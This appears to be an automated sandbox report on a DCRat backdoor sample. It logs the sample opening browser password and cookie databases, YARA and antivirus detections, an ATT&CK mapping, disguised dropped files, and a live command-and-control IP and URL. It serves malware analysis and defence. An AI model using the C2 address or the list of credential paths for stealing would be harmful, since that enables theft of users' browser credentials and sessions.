                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior

                        Remote Access Functionality

                        barindex
                        Yara detected DCRat
                        Source: Yara matchFile source: 3e88PGFfkf.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.3e88PGFfkf.exe.f50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.4176520773.00000000035F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.4176520773.0000000003779000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.4176520773.000000000345B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1698323315.0000000000F52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 3e88PGFfkf.exe PID: 3732, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: psSFLznncXozWndMhTDdwutNn.exe PID: 6268, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Recovery\WinStore.App.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting                        		Valid AccountsWindows Management Instrumentation1
                        Scripting                        		12
                        Process Injection                        		13
                        Masquerading                        		1
                        OS Credential Dumping                        		21
                        Security Software Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		LSASS Memory2
                        Process Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		1
                        Non-Application Layer Protocol                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
                        Virtualization/Sandbox Evasion                        		Security Account Manager131
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin Shares1
                        Clipboard Data                        		11
                        Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                        Process Injection                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information                        		LSA Secrets1
                        Remote System Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                        Obfuscated Files or Information                        		Cached Domain Credentials1
                        System Network Configuration Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Software Packing                        		DCSync2
                        File and Directory Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading                        		Proc Filesystem114
                        System Information Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579264 Sample: 3e88PGFfkf.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Antivirus detection for dropped file 2->55 57 11 other signatures 2->57 7 3e88PGFfkf.exe 4 24 2->7         started        process3 file4 25 C:\Users\user\Desktop\wOXBumXW.log, PE32 7->25 dropped 27 C:\Users\user\Desktop\vJMbuDiW.log, PE32 7->27 dropped 29 C:\Users\user\Desktop\bAJNFhyM.log, PE32 7->29 dropped 31 12 other malicious files 7->31 dropped 59 Found many strings related to Crypto-Wallets (likely being stolen) 7->59 11 cmd.exe 1 7->11         started        signatures5 process6 signatures7 61 Uses ping.exe to sleep 11->61 63 Uses ping.exe to check the status of other devices and networks 11->63 14 psSFLznncXozWndMhTDdwutNn.exe 14 292 11->14         started        19 conhost.exe 11->19         started        21 PING.EXE 1 11->21         started        23 chcp.com 1 11->23         started        process8 dnsIp9 41 185.230.138.58, 49730, 49732, 49733 QUICKPACKETUS Germany 14->41 33 C:\Users\user\Desktop\yXpCqrRs.log, PE32 14->33 dropped 35 C:\Users\user\Desktop\wMTBqZlr.log, PE32 14->35 dropped 37 C:\Users\user\Desktop\mezlGwgJ.log, PE32 14->37 dropped 39 2 other malicious files 14->39 dropped 43 Multi AV Scanner detection for dropped file 14->43 45 Found many strings related to Crypto-Wallets (likely being stolen) 14->45 47 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 14->47 49 Tries to harvest and steal browser information (history, passwords, etc) 14->49 file10 signatures11

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        3e88PGFfkf.exe65%VirustotalBrowse
                        3e88PGFfkf.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        3e88PGFfkf.exe100%AviraHEUR/AGEN.1309961
                        3e88PGFfkf.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\aWMGkikz2Q.bat100%AviraBAT/Delbat.C
                        C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exe100%AviraHEUR/AGEN.1309961
                        C:\Users\user\Desktop\NWogOZDl.log100%AviraTR/AVI.Agent.updqb
                        C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exe100%AviraHEUR/AGEN.1309961
                        C:\Users\user\Desktop\YIOWuXMo.log100%AviraTR/AVI.Agent.updqb
                        C:\Recovery\WinStore.App.exe100%AviraHEUR/AGEN.1309961
                        C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exe100%AviraHEUR/AGEN.1309961
                        C:\Users\user\Desktop\mezlGwgJ.log100%Joe Sandbox ML
                        C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exe100%Joe Sandbox ML
                        C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exe100%Joe Sandbox ML
                        C:\Users\user\Desktop\lhYdlwRP.log100%Joe Sandbox ML
                        C:\Users\user\Desktop\FsgregnE.log100%Joe Sandbox ML
                        C:\Users\user\Desktop\yXpCqrRs.log100%Joe Sandbox ML
                        C:\Users\user\Desktop\vJMbuDiW.log100%Joe Sandbox ML
                        C:\Recovery\WinStore.App.exe100%Joe Sandbox ML
                        C:\Users\user\Desktop\bAJNFhyM.log100%Joe Sandbox ML
                        C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Recovery\WinStore.App.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Users\user\Desktop\FsgregnE.log29%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\Desktop\NWogOZDl.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Users\user\Desktop\YIOWuXMo.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Users\user\Desktop\bAJNFhyM.log16%ReversingLabs
                        C:\Users\user\Desktop\lhYdlwRP.log16%ReversingLabs
                        C:\Users\user\Desktop\mezlGwgJ.log5%ReversingLabs
                        C:\Users\user\Desktop\vJMbuDiW.log5%ReversingLabs
                        C:\Users\user\Desktop\wMTBqZlr.log3%ReversingLabs
                        C:\Users\user\Desktop\wOXBumXW.log3%ReversingLabs
                        C:\Users\user\Desktop\yXpCqrRs.log29%ReversingLabsWin32.Trojan.Generic

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://185.230.138.58/video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.phptrue
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drfalse
                            		high
                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFb8aNRiIJEo.5.drfalse
                              		high
                              http://www.apache.org/licenses/LICENSE-2.0psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.compsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designersGpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drfalse
                                      		high
                                      http://www.fontbureau.com/designers/?psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/bThepsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icopsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drfalse
                                            		high
                                            http://www.fontbureau.com/designers?psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drfalse
                                                		high
                                                http://www.tiro.compsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://185.230.138.58/video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.000000000345B000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003445000.00000004.00000800.00020000.00000000.sdmptrue
                                                    		unknown
